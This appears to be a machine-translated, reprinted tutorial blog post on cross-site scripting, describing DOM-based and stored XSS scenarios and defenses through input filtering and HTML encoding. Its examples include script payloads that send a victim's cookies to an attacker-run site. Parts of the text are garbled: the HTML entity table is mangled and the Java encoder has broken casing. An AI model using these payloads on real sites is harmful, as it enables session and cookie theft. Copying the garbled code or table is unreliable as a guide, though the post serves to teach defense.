XSS attacks and defenses

This article from: Gao | Coder, the original address: http://blog.csdn.net/ghsau/article/details/17027893, reprint please specify.
XSS, also known as CSS, the Universal cross-sitescript, multi-site scripting attacks, is a common vulnerability in web programs, XSS is passive and used for the client's attack mode, so it is easy to ignore its harmfulness. The principle is that an attacker would enter (pass in) malicious HTML code into a Web site with an XSS vulnerability, and the HTML code would be executed automatically when other users browsed the site for the purpose of the attack. For example, theft of user cookies, destruction of page structure, redirection to other websites, etc.

XSS attack

XSS attack is similar to SQL injection attack, we first found an XSS vulnerability in the Web site, XSS vulnerability is divided into two kinds, one is Dom Based XSS vulnerability, the other is a stored XSS vulnerability. Theoretically, there is an XSS vulnerability in which all input data is not processed, and the vulnerability depends on the power of the attack code, and the attack code is not limited to script.

DOM Based XSS

Dom Based XSS is an attack that is based on the structure of a Web page DOM, which is characterized by a minority of people in the Strokes.

Scenario One :

When I log in to a.com, I find that some content of its page is directly displayed according to a URL called content parameter, guess it is possible to test the page processing, other languages similar:

<%@ page language= "Java" contenttype= "text/html; Charset=utf-8 "pageencoding=" UTF-8 "%><! Doctypehtmlpublic "-//w3c//dtd HTML 4.01 transitional//en" "Http://www.w3.org/TR/html4/loose.dtd" >
　　
I got it. Tom also registered the site, and know his e-mail (or other information to receive the contact), I made a hyperlink to him, the hyperlink address is: Http://www.a.com?content=<script>window.open ( "Www.b.com?param=" +document.cookie) </script> When Tom clicks on the link (assuming he's already signed in A.com), The browser will open B.Com directly, and Tom in a.com cookie information sent to b.com,b.com is I set up the website, when my website received this information, I stole Tom in a.com cookie information, cookie information may have login password, attack success! In the process, only Tom himself was the victim. That when I enter A.com?content=<script>alert ("XSS") </script> in the browser, the browser shows the contents of the page in the process of executing my script, the page output XSS Word, which is attacking myself, How do I attack others and make a profit?
Stored XSS
Stored XSS is a storage-type XSS vulnerability, because its attack code has been stored on the server or in the database, so the victim is a lot of people.
Scenario Two :
A.com can send articles, I log in a.com post an article, the article contains malicious code, <script>window.open ("www.b.com?param=" +document.cookie) </ Script> Save the article. When Tom and Jack saw my post, when they looked at my article, they all took, their cookie information was sent to my server, attack success! In this process, the victim is more than one person.
Stored XSS Vulnerability is more harmful, the harm surface is more extensive.
XSS Defense
We are in a contradictory world, with spears there are shields. As long as there is no vulnerability in our code, the attacker will not be possible, we will make an egg that is not sewn. XSS defense has the following methods.
Perfect filtration System
Never trust the user's input. The user's input needs to be processed, allowing only valid values to be entered, and all other values filtered out.
Html encode
If in some cases we cannot strictly filter user data, we also need to convert the tags.

 
 

  
  
 
   
 
    
less-than character (<) 
 
 
    
 
 
   
 
   
 
    
greater-than character (>) 
 
 
    
 
&GT; 
 
 
   
 
   
 
    
ampersand character (&) 
 
 
    
& Amp;amp; 
 
 
   
 
   
 
    
double-quote character (") 
 
 
    
& Amp;quot; 
 
 
   
 
   
 
    
space character () 
 
 
    
&nbsp; 
 
 
   
 
   
 
    
any ASCII code character whose code was Greater-than or equal to 0x80 
 
 
    
&#<NUMBER>, where <number> is the ASCII character value .
 
   
 
  
 
 
For example, user input: <script>window.location.href= "http://www.baidu.com"; </script> after saving, the final storage will be: &lt;script &gt;window.location.href=&quot;http://www.baidu.com&quot;&lt;/script&gt; When presented, the browser converts these characters into text content instead of an executable code.
The other methods below provide two kinds of HTML encode.
 
 

  
  
 
   
Using Apache's Commons-lang.jar 
    
 
     
 
      
 
       
Stringescapeutils.escapehtml (str);//kanji will be converted to the corresponding ASCII code, space does not convert
 
      
 
     
 
    
 
  
 
 
 
 

  
  
Implement the conversion yourself, convert only part of the character 
   
 
    
 
     
 
      
private static String HtmlEncode (char c) {
Switch (c) {
 Case ' & ':
return"&amp;";
 Case ' < ':
return"&lt;";
 Case ' > ':
return"&gt;";
 Case ‘"‘:
return"&quot;";
 Case ‘ ‘:
return"&nbsp;";
default:
return C + "";
}
}
/** Html encode conversion of incoming string str */
Public Static String HtmlEncode (String str) {
if   (str = =Null | | Str.trim (). Equals ("")) return str;
StringBuilder Encodestrbuilder = new StringBuilder ();
 for (int i = 0, Len = str.length (); i < Len; i++) {
Encodestrbuilder.append (htmlEncode(Str.charat (i)));
}
return encodestrbuilder.tostring ();
}
 
     
 
    
 
   
 
 
Finish
XSS attacks and defenses